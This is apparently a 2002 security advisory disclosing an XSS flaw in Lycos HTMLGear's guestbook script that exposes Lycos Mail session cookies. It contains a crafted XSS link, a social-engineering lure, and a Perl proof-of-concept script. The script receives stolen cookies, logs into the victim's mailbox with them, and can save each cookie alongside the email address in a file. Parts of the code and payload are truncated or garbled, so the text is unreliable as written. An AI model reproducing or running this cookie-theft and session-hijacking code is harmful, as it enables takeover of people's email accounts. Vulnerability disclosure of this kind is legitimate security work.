Lycos XSS/Cookie problems Advisory
Lycos XSS/Cookie problems
- by "N|ghtHawk" Thijs Bosschert (nighthawk_at_hackers4hackers.org)
Vendor Information:
Homepage : http://www.lycos.com
Vendor informed
About bug : -
Mailed advisory: 01/11/02
Vender Response : None (yet?)
Version on site : control.guest still vulnerable for XSS
Cookie capturing still possible
Because of not answering in the past, I didn't wait
long before making this advisory public.
Affected Versions:
Tested on:
- Lycos.com Mail
Not tested on:
- Other Lycos services
What is lycos?
- http://login.mail.lycos.com/
- Lycos Mail is a full featured web-based email solution.
Lycos Mail now offers two levels of email service, a
standard FREE version and a NEW Lycos Mail Plus option
for the more demanding user.
- http://htmlgear.lycos.com
- Professional Gears!
Professional Gears eliminate ALL ads and HTML Gear branding and
give you the freedom to integrate Gears more seamlessly on your
site. The result is a more professional-looking Gear that's
perfect for business and personal sites. Here are just a few of
the reasons why you should go pro . . .
'Matthew Murphy' found on Sept 14 2002 some bugs in the
HTMLGear Guestbook, which can be viewed on:
- http://online.securityfocus.com/archive/1/292131
- http://online.securityfocus.com/bid/5728
Besides those bugs, the HTMLGear got also a XSS in 'control.guest'
on the lycos.com server. Both bugs can be used to get the cookies
from users of the site.
The real problem in this is that through this way people their
lycosmail cookies can be captured. This can be done when people
use the "Save User Name & Password" option when login in and don't
log out. Closing the browser wil not log them out.
With the cookie of a lycosmail user, people can have access to their
Inject javascript into the htmlgear of none patched/bad filtered
Or let people click on the next url:
- http://htmlgear.lycos.com/guest/control.guest?u=poof&a=">
This can be done by letting people click on a link, which you can
mail them:
- Britney Nude!
All will connect with a perl script (fragile.pl), this script will
take the cookie, and make a connection to lycos.com to login on
the mailserver using the cookie. Then it wil request the inbox or
the frontpage of the mailbox of the user.
With the third option in the exploit it just captures the cookies
and write them in a file together with the emailaddress.
This is just a proof of concept, you could also change it to let
it read mail. Please don't email me with request to write
#!/usr/bin/perl -w
# Lycos.com XSS/Cookie Problems
# N|ghtHawk
# nighthawk_at_hackers4hackers.org
use IO::Socket;
# 1. See Mail Frontpage
# 2. See Inbox
# 3. Only save Cookie
$option = 2;
$path = "/tmp/";
$cookie = "$ENV{QUERY_STRING}\;";
$cookie =~ s/%20/ /g;
if ($cookie !~ "MAYA") {
$ip = "";
$host = "login.mail.lycos.com";
$req = "\/?callback\=http:\/\/inbox.mail.lycos.com\/jumpPage.shtml";
$data = request($ip, $host, $req);
@datar = split(/\n/,$data);
foreach $line (@datar) {
if ($line =~ /[Cc]ookie: *(.*)\; *.*\;/) {
$line = $1;
if ($line !~ "L_LOC") {
$cookie .= " $line\;";
} else {
$cookie .= " $line";
} elsif ($line =~ /Location: *http\:\/\/inbox.mail.lycos.com(.*)/) {
$req = $1;
if ($option == 1 || $option == 3) {
$ip = "";
$host = "inbox.mail.lycos.com";
$data = request($ip, $host, $req);
if ($option == 2) {
$ip = "";
$host = "login.mail.lycos.com";
$req = "\/bounce.shtml?goto=folder&folderId=!1inbox&user=&count=1";
$data = request($ip, $host, $req);
@datar = split(/\n/,$data);
foreach $line (@datar) {
if ($line =~ /Location: *http:\/\/(.*com)(\/.*)/) {
$host = $1;
$req = $2;
$data = request($host,$host,$req);
sub out {
my ($data) = @_;
@datar = split(/\n/,$data);
foreach $line (@datar) {
if ($line =~ /Hello, * (.+\@lycos.com)<\/b>/) {
$name = $1;
if ($option == 3) {
$data = "$name\n$cookie\n";
$name = "cookies";
print FILE "$data\n";
print "Content-type: text/html\n";
print "Location: http://www.dwheeler.com/secure-programs".
sub request {
my ($ip, $host, $req) = @_;
$sock = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ip",
PeerPort => "80",
Timeout => 30) || die "Could not create socket: $!\n";
print $sock "GET $req HTTP/1.0\n".
"Host: $host\n".
"Accept: image/gif, image/x-xbitmap, */*\n".
"Accept-Language: nl\n".
"User-Agent: Pr00fOfConcept/1.0 \n".
"Connection: Keep-Alive\n".
"Cookie: $cookie\n\n";
return $data;
sub no_cookie {
print "content-type: text/html\n\n";
print "No Lycos Mail Cookie found
Well, it's up to Lycos to patch this. It would be a good idea
not to put insecure scripts on a server which uses the same
cookies as your mailsystem.
Wim, Digiover, Asby